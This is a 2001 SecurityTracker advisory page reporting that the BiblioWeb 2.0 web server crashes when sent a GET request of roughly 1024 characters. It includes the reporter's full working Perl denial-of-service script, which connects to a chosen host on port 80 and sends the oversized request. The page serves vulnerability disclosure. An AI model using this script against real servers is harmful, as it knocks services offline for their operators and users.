SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
About the Archives
Want to learn about the SecurityTracker archives? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Web Server/CGI)  >  BiblioWeb Vendors:  CG Information
BiblioWeb Server Can Be Crashed By a Remote User Sending a Long URL
Date:  Jun 13 2001 19:06 (UTC/GMT)
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): version 2.0
Description:  A vulnerability has been reported in the web server component of BiblioWeb that allows remote users to cause the web server to crash.

By sending a GET request with approximately 1024 characters as the target of the request, a remote user can cause the web server to crash.

A demonstration exploit Perl script is included in the Source Message.
Impact:  A remote user can cause the web server to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.biblioscape.com/biblioweb.htm (Links to External Site)
Cause:  Boundary error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
Reported By:  alt3kx_h3z@hotmail.com
Message History:   None.

 Source Message Contents
Date:  Wed, 13 Jun 2001 00:05:28 -0400
From:  alt3kx_h3z@hotmail.com
Subject:  BiblioWeb vulnerability

 

BiblioWeb version 2.0

Exploit:

#!/usr/bin/perl

system ("clear");

print 
"#################################################################\n";
print "#								\n";
print "#								\n";
print "# Simple Denial of Service against the Biblioweb Server		\n";
print "# Reference http://www.biblioscape.com				\n";
print "# Based info joetesta\@hushmail.com 	 			\n";
print "# 		 						\n";
print "#		 						\n";
print "# Author: alt3kx! alt3kx\@ <raza-mexicana.org> 			\n";
print "#								\n";
print "# 		 						\n";
print "# 		   www.raza-mexicana.org			\n";


use Getopt::Std;
use Socket;

getopts('h:', \%args);
if(!defined($args{h})){&usage;}

($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);

$def = "A";
$num = "1024";
$data .= $def x $num;
$serv = $args{h};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";


$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";


print("\nData has been successfully sent to $serv\n\n");

sub usage {die("\n\nUsage: perl -x $0 -h <hostname>\n\n");}


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2001, SecurityGlobal.net LLC